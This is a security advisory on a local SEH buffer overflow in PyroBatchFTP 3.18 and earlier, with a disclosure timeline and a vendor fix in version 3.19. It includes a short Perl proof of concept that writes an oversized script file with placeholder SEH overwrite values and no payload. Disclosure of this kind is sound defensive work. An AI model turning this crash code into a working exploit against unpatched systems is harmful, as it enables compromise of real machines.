1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
============================================= MGC ALERT 2018-001 - Original release date: December 22, 2017 - Last revised:January 12, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,5/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH) II. BACKGROUND ------------------------- PyroBatchFTP is a Windows software that lets you exchange files with FTP, FTPS or SFTP servers in an automatic and unattended way, using a simple yet powerful batch/script language. III. DESCRIPTION ------------------------- The Enterprise version of PyroBatchFTP is affected by a Local Buffer Overflow vulnerability. The application does not check bounds when reading the file that will execute the script, resulting in a classic Buffer Overflow overwriting SEH handler. To exploit the vulnerability only is needed create a local script to interact with the application. IV. PROOF OF CONCEPT ------------------------- my $file= "crash.cmd"; my $junk= "A" x 2052; my $nseh = "BBBB"; my $seh = "CCCC"; open($FILE,">$file"); print $FILE $junk.$nseh.$seh; close($FILE); print "File Created successfully\n"; V. BUSINESS IMPACT ------------------------- Availability compromise can result from these attacks. VI. SYSTEMS AFFECTED ------------------------- PyroBatchFTP <= 3.18 VII. SOLUTION ------------------------- Vendor release 3.19 version http://www.emtec.com/downloads/pyrobatchftp/pyrobatchftp319_changes.txt VIII. REFERENCES ------------------------- https://www.emtec.com/pyrobatchftp/index.html IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- December 22, 2017 1: Initial release January 12, 2018 2: Revision to send to lists XI. DISCLOSURE TIMELINE ------------------------- December 22, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas December 22, 2017 2: Send to vendor January 12, 2018 3: Vendor fix the vulnerability and release a new version January 12, 2018 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester |